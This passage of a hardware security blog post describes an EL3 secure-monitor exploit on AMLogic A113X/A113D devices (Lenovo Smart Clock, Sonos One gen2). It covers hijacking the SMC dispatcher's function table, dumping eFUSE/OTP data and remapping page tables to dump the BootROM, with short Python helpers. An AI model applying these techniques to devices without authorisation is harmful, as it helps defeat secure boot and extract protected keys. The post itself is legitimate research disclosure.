We can use exactly the same approach, but instead with SIP_CMD_STORAGE_WRITE to get an arbitrary write64 primitive.

Using our write64 primitive we can finally overwrite the pointer to platform_ops to hijack the function pointer table of the SiP SMC dispatcher.

[+] Dumping the eFUSE/OTP data

So we have some control flow hijacking in the secure monitor. What’s next? Let’s try to dump the eFUSE/OTP data somehow.

Let us start by slightly upgrading our set of primitives. The SiP SMC dispatcher will invoke the correct function pointer from the platform_ops table depending on the SMC ID and call this function with the right amount of arguments that were originally passed to the SMC. I noticed SMC 0x820000FF will pass the original SMC arguments (X1, X2, X3, X4) into the handler for SMC 0x820000FF as-is (X0, X1, X2, X3).

So hijacking this entry in the platform_ops table while leaving the rest untouched will give us an arbitrary call4 (function call with up to 4 controlled arguments) primitive when invoking SMC 0x820000FF.

During reversing I already identified the EL3 code that reads data from the OTP. This works by sending an SCPI message (command 0x8000C2 to be precise) to the SCP (System Control Processor) using some mailbox MMIO interface. We don’t have to reimplement this of course, we just call4 the convenience function that does this for us.

The prototype for this function is:

int aml_scpi_cmd_efuse_read(void *out, uint32_t offset, uint32_t size);

So, in order to dump the eFUSE/OTP data using our EL3 SMC exploit, we can just: call4(aml_scpi_cmd_efuse_read, SOME_DRAM_ADDRESS, 0, 0x100)

And afterwards we just read it back from DRAM from the “normal world”. :-)

[+] Dumping the BootROM

We’re almost done, but a copy of the application processor’s BootROM would be nice to have now we’re able to run code in this privileged context. From the (leaked) A113X datasheet we can learn that the physical address of the BootROM is 0xffff0000.

However, we can’t simply read it from EL3 because BL31 configured the MMU and there is no VA -> PA 0xffff0000 mapping we can read from. Let’s learn a bit about MMU setup and the page tables.

The intricate details of the AArch64 memory model are quite involved. We’re only going to try and understand the bare minimum amount of details needed to patch up the existing configuration/page tables so we can dump the ROM. ;-)

In EL3 the level 1 page table address is configured by writing to the special register TTBR0_EL3 (the Translation Table Base Register 0 for EL3) using the MSR instruction. Another important special register is TCR_EL3 (the Translation Control Register for EL3), which configures things like the page granule and size of the address space.

If we follow the ATF code (and BL31 disassembly) we will find the routine enable_mmu_el3 which contains the following writes to these special registers:

TCR_EL3 = 0x80803520
TTBR0_EL3 = base_xlation_table

0x80803520 corresponds to the following settings for TCR_EL3:

Bits	Field	Value
0:5	T0SZ	0x20
8:9	IRGN0	1
10:11	ORGN0	1
12:13	SH0	3
14:15	TG0	0 = 4KiB page granule
16:18	PS	0
20	TBI	0 = Top Byte used in the address calculation.

The size of the address space can be calculated by doing 64 - T0SZ. So in this case we have a 32bit address space. With a 4KiB granule and a 32bit address space there is no level 0 page table, we start at level 1. The level 1 page table index bits are bits 30 up till (and including) bit 38. For a 32bit address this means it will only be indexed with bit 30 and 31 giving us a level 1 page table size of exactly 4 entries. Each entry spans 1GiB (0x40000000).
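The register value can be picked apart mechanically. The field positions below follow the architectural layout of TCR_EL3 (T0SZ in bits 0:5, IRGN0 in 8:9, ORGN0 in 10:11, SH0 in 12:13, TG0 in 14:15, PS in 16:18, TBI in bit 20); the helper names are made up, and l1_entries only makes sense for a 4KiB granule where translation starts at level 1.

```python
TCR_EL3_FIELDS = {  # name: (lowest bit, width)
    "T0SZ": (0, 6),
    "IRGN0": (8, 2),
    "ORGN0": (10, 2),
    "SH0": (12, 2),
    "TG0": (14, 2),
    "PS": (16, 3),
    "TBI": (20, 1),
}


def decode_tcr_el3(value):
    """Extract the named fields from a TCR_EL3 value."""
    return {name: (value >> lsb) & ((1 << width) - 1)
            for name, (lsb, width) in TCR_EL3_FIELDS.items()}


def va_bits(t0sz):
    """Size of the virtual address space in bits."""
    return 64 - t0sz


def l1_entries(t0sz):
    """Level 1 entries (1GiB each); assumes a 4KiB granule, level 1 start."""
    return 1 << (va_bits(t0sz) - 30)


if __name__ == "__main__":
    fields = decode_tcr_el3(0x80803520)
    print(fields, va_bits(fields["T0SZ"]), l1_entries(fields["T0SZ"]))
```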

If we dump the level-1 page table by reading 32 bytes from the address written to TTBR0_EL3, we see:

0x00000000051c6003
0x0000000000000000
0x0000000000000000
0x00000000051c9003

The lower 2 bits of the entries in the table describe the type of address they point to. Any entry which does not have bit0 set is considered invalid. The first and last entry have a value of 0x3 for the lower 2 bits, which means they are addresses pointing to the next level’s table.

Level-2 page tables are indexed using bits 21:29 (9 bits) of the virtual address. Since we’re interested in the address 0xffff0000 we can calculate the index into the table by taking bits 21:29 which is 0x1ff. Every entry in the level-2 table spans a region of 2MiB, so entry 0x1ff covers ffe00000-ffffffff.

At 0x51c9000 + (0x1ff * 8) we find the value 0x51cd003, a table descriptor pointing at the level-3 pagetable at 0x51cd000. At the level-3 pagetable no more indirection is allowed. Every 64bit value in a level3 table describes the mapping of a 4KiB page.
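The walk for 0xffff0000 can be replayed with a few shifts and masks. The descriptor values are the ones dumped from the target above; table_indices and next_table are names made up for this sketch, which assumes a 4KiB granule.

```python
def table_indices(va):
    """Per-level table indices for a 4KiB granule (9 bits per level)."""
    return {
        "l1": (va >> 30) & 0x1FF,
        "l2": (va >> 21) & 0x1FF,
        "l3": (va >> 12) & 0x1FF,
    }


def next_table(descriptor):
    """Physical address of the next-level table from a table descriptor."""
    if descriptor & 0x3 != 0x3:
        raise ValueError("not a table descriptor")
    return descriptor & 0x0000FFFFFFFFF000


if __name__ == "__main__":
    idx = table_indices(0xFFFF0000)
    l2_table = next_table(0x00000000051C9003)  # level-1 entry 3
    l2_entry_addr = l2_table + idx["l2"] * 8
    l3_table = next_table(0x51CD003)           # value found at l2_entry_addr
    l3_entry_addr = l3_table + idx["l3"] * 8
    print(idx, hex(l2_entry_addr), hex(l3_entry_addr))
```

For 0xffff0000 this yields level-1 index 3, level-2 index 0x1ff and level-3 index 0x1f0, so the level-3 descriptor for the first BootROM page sits at 0x51cd000 + 0xf80.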

A level3 descriptor value is structured like this:

Bits	Field	notes
52:63	UPAT	Upper Page Attributes
40:51	RES0	Should be zeroed
12:39	ADDR	Address bits 12-39
2:11	LPAT	Lower Page Attributes
0:1	reserved	always 0x3 (0b11)

The upper page attributes consist of 3 single-bit properties (ignoring any reserved bits): the contiguous hint bit (52), the PXN bit (53) and the XN bit (54).

We don’t really care about enforcing XN (eXecute Never) or PXN (Privileged eXecute Never), and we don’t have to set the contiguous hint bit either for the page table entries we’re about to introduce, so our UPAT value is zero.

The lower page attributes (10bits) are a bit more involved and are structured like this:

The attrindex field needs to match the correct index for the MAIRn (Memory Attribute Indirection Register) that has been configured. In enable_mmu_el3 they configure MAIR1, so we use an attrindex value of 0b001.

The ns bit is the Non-Secure bit, since we’ll be dumping the ROM using our privileged read64 primitive we can simply leave this set to 0.

The two-bit ap field in the entry maps to the page access permissions as per the AP[2:1] access permission model. Again, since we’re only going to access this region with our privileged read64 primitive, it is safe to set these bits to 0, making the entry R/W for our privilege level.

The sh field is used to specify the “shareability” attributes of this page. We’ll specify a value of 0b10 here (Outer Shareable), so any processor, core and peripheral can access this. (Although that isn’t strictly necessary of course)

The af bit we’ll set to 1 for reasons I never bothered to fully comprehend. Finally, the nG (not-Global) bit indicates if an entry is global or not, we’ll leave this bit cleared to mark it as global.

We end up with a LPAT value of 0x181.
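As a sanity check, the LPAT value can be composed from the individual fields. Bit positions are relative to bit 2 of the descriptor: attrindex in bits 0:2, ns in bit 3, ap in bits 4:5, sh in bits 6:7, af in bit 8 and nG in bit 9. The function names are made up for this sketch.

```python
def lower_attrs(attrindex, ns, ap, sh, af, ng):
    """Compose the 10-bit lower page attributes field."""
    return ((attrindex & 0x7)
            | ((ns & 0x1) << 3)
            | ((ap & 0x3) << 4)
            | ((sh & 0x3) << 6)
            | ((af & 0x1) << 8)
            | ((ng & 0x1) << 9))


def l3_descriptor(phys_addr, lpat, upat=0):
    """Build a level-3 page descriptor for a 4KiB page."""
    return (phys_addr & 0xFFFFF000) | (upat << 52) | (lpat << 2) | 0x3


if __name__ == "__main__":
    lpat = lower_attrs(attrindex=1, ns=0, ap=0, sh=2, af=1, ng=0)
    print(hex(lpat), hex(l3_descriptor(0xFFFF0000, lpat)))
```

With the field values chosen above this gives 0x181 for the attributes and 0xffff0607 for the descriptor of the first BootROM page.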

Putting it all together, we can construct our page table entries by doing:

(addr & 0xfffff000) | (0x181 << 2) | 3

We don’t exactly know (yet) how big the BootROM is, but we can start by mapping 64KiB worth of pages starting at 0xffff0000 and see how far that gets us. To calculate the index into the L3 page table we’re patching we can simply do (addr - 0xffe00000) / 0x1000, and of course multiply this index by 8 if we want the byte offset (remember every pagetable entry is 64bits).

Let’s summarize in a simple to follow python snippet:

#!/usr/bin/env python

LPAT = 0x181
UPAT = 0

tbl_start = 0xffe00000
map_start = 0xffff0000
map_end = map_start + (1024 * 64)

for addr in range(map_start, map_end, 0x1000):
    index = (addr - tbl_start) // 0x1000
    entry = (addr & 0xfffff000) | (UPAT << 52) | (LPAT << 2) | 3
    print("write64(L3_TABLE + 0x%04x, 0x%016x)" % (index * 8, entry))

This will give us a list of 64bit writes we need in order to map (1:1, identity-mapped, VA=PA) the BootROM region. Afterwards, we simply use our read64 primitive to dump the entire 64KiB region to a file. Of course we could have easily upgraded the read64 primitive to something that allows us to read data faster; as it stands it takes a minute or so to dump the full 64KiB for us.. but who would mind a little suspense after all this work? ;-)

After examining the result data we got we can quickly notice some repeating strings and we can conclude the image loops after 0x8000 bytes. So the actual size of the ROM is 32KiB.
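Spotting the mirror by eye works, but it can also be checked programmatically. A minimal sketch (mirror_period is a hypothetical helper, and the dump file name is only an example) that keeps halving the image for as long as both halves are identical:

```python
def mirror_period(data):
    """Return the smallest power-of-two fraction of data that repeats
    to fill the whole buffer (len(data) if there is no mirroring)."""
    period = len(data)
    while period > 1 and period % 2 == 0:
        half = period // 2
        if data[:half] != data[half:period]:
            break
        period = half
    return period


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 2:
        # e.g. the raw 64KiB dump produced with the read64 primitive
        with open(sys.argv[1], "rb") as fh:
            dump = fh.read()
        print("image repeats every 0x%x bytes" % mirror_period(dump))
```

Note that this only checks power-of-two periods, which is what you would expect from address lines that are simply not decoded.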

$ sha256sum a113x_bootrom.bin
7d1f63f6ddec05f538243aaa532c0503517de8ce9d2033d2b36b6c79695be626  a113x_bootrom.bin

[+] Closing Words & What’s next?

You made it this far!

I started writing this post back in December.. but documenting stuff for the public is always much less exciting than working on new stuff, bla bla bla.

Anyway, I hope you enjoyed the read! Feel free to reach out to point out any inconsistencies. The EL3 exploit described in this post applies to both the Lenovo Smart Clock (AMLogic A113X SoC) as well as the Sonos One gen2 (AMLogic A113D SoC). The exploit was initially prototyped on the Lenovo clock from a U-boot context and was later ported to the Sonos One to a Linux userland context (assisted by a custom kernel module). All of this code can be found on Github.

It would be great if some exploit could be found in the a113x/d bootrom. I did some cursory RE work to quickly check if the amlogic-usbdl bug is also present in the a113x bootrom, but it looks like that is not the case. (feel free to double check, of course :-))

Even if such a bug was present it would be useless for permanently jailbreaking the Sonos One gen2 though, since they blow the eFUSE which disables the USB recovery stuff in the BootROM altogether. :-(

There will be a follow up post describing some Sonos specific stuff like their flash encryption and OTA update encryption, stay tuned!